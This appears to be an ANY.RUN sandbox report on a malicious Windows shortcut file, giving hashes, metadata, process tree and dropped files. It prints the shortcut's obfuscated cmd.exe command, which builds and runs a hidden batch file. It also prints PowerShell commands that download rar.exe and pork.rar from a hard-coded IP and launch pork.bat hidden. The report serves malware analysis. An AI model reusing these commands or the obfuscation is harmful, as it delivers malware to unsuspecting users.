File name: | 848a669d612185bbcbff5392f41a0d2e4ddad8cc5c276ec313216f1724a153fa |
Full analysis: | https://app.any.run/tasks/fc2460c9-84da-4b79-bac8-d9b1660b6f2b |
Verdict: | Malicious activity |
Analysis date: | August 26, 2019, 02:43:40 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/octet-stream |
File info: | MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=16, Archive, ctime=Sun Nov 21 02:23:55 2010, mtime=Sun Nov 21 02:23:55 2010, atime=Sun Nov 21 02:23:55 2010, length=345088, window=hidenormalshowminimized |
MD5: | 98FEB8F7B3B60BE46E17323D9C815089 |
SHA1: | 70F7178F6DDB07431CCB1B7C0E6DBC45E186EAE3 |
SHA256: | 848A669D612185BBCBFF5392F41A0D2E4DDAD8CC5C276EC313216F1724A153FA |
SSDEEP: | 24:8TTc78EaJpmQVUAOe+/zLaDRNmzPH3MtwUpvZbb+///Ecpca4I0w/6c2ie3SAiOI:8TlEkp2tzP8xpvxTIR16zpSLVihRvDM |
.lnk | | | Windows Shortcut (100) |
---|
Flags: | IDList, LinkInfo, RelativePath, CommandArgs, IconFile, Unicode, ExpString, ExpIcon, TargetMetadata |
---|---|
FileAttributes: | Archive |
CreateDate: | 2010:11:21 04:23:55+01:00 |
AccessDate: | 2010:11:21 04:23:55+01:00 |
ModifyDate: | 2010:11:21 04:23:55+01:00 |
TargetFileSize: | 345088 |
IconIndex: | 16 |
RunWindow: | Show Minimized No Activate |
HotKey: | (none) |
TargetFileDOSName: | cmd.exe |
DriveType: | Fixed Disk |
VolumeLabel: | - |
LocalBasePath: | C:\Windows\System32\cmd.exe |
RelativePath: | ..\..\..\..\..\..\Windows\System32\cmd.exe |
CommandLineArguments: | /C "( for /f "tokens=1,2 delims=!" %a in ('findstr fsdfssddgs "*.*"') do %temp:~-3,1%cho %b>>%TEMP%\ddwe.bat )&(%windir:~-1,1%tart /MIN %TEMP%\ddwe.bat)&EXIT" |
IconFileName: | C:\Windows\System32\imageres.dll |
MachineID: | win-oe3kip7un0v |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3700 | "C:\Windows\System32\cmd.exe" /C "( for /f "tokens=1,2 delims=!" %a in ('findstr fsdfssddgs "*.*"') do %temp:~-3,1%cho %b>>C:\Users\admin\AppData\Local\Temp\ddwe.bat )&(%windir:~-1,1%tart /MIN C:\Users\admin\AppData\Local\Temp\ddwe.bat)&EXIT" | C:\Windows\System32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2356 | C:\Windows\system32\cmd.exe /c findstr fsdfssddgs "*.*" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2572 | findstr fsdfssddgs "*.*" | C:\Windows\system32\findstr.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Find String (QGREP) Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3100 | C:\Windows\system32\cmd.exe /K C:\Users\admin\AppData\Local\Temp\ddwe.bat | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3892 | powershell Invoke-WebRequest -Uri "http://185.82.202.66/rar.exe" -OutFile "C:\Users\admin\AppData\Local\Temp\rar.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2800 | powershell Invoke-WebRequest -Uri "http://185.82.202.66/pork.rar" -OutFile "C:\Users\admin\AppData\Local\Temp\pork.rar" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3628 | powershell start-Process -FilePath "C:\Users\admin\AppData\Local\Temp\pork.bat" -WindowStyle hidden | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (3892) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US | |||
(PID) Process: | (2800) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US | |||
(PID) Process: | (3628) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\72\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US |
PID | Process | Filename | Type | |
---|---|---|---|---|
3892 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QQETYY1VUJRNQ3HHSSAJ.temp | — | |
MD5:— | SHA256:— | |||
2800 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MSBU7FZB8P2UROYN0I9H.temp | — | |
MD5:— | SHA256:— | |||
3628 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K0036NA8XBUKYW041Z4K.temp | — | |
MD5:— | SHA256:— | |||
3100 | cmd.exe | C:\Users\admin\AppData\Local\Temp\ddwe.bat | — | |
MD5:— | SHA256:— | |||
3892 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF169b3b.TMP | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 | |||
3100 | cmd.exe | C:\Users\admin\AppData\Local\Temp\pork.txt | text | |
MD5:FA7D38E2978C6493B11157F795323C1F | SHA256:77D17F6A0739C8CC5D3D81951DD552774A3FDD5D4C8A943FC295A2B721E31332 | |||
3700 | cmd.exe | C:\Users\admin\AppData\Local\Temp\ddwe.bat | text | |
MD5:DBF82D68E3E77A8CB49F28E95357BD44 | SHA256:9EBB6857F06052A62D88BC82A40D4C2BCF9D3BAF7394AEA84110844A5492408D | |||
3628 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16a117.TMP | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 | |||
2800 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF169e96.TMP | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 | |||
2800 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 |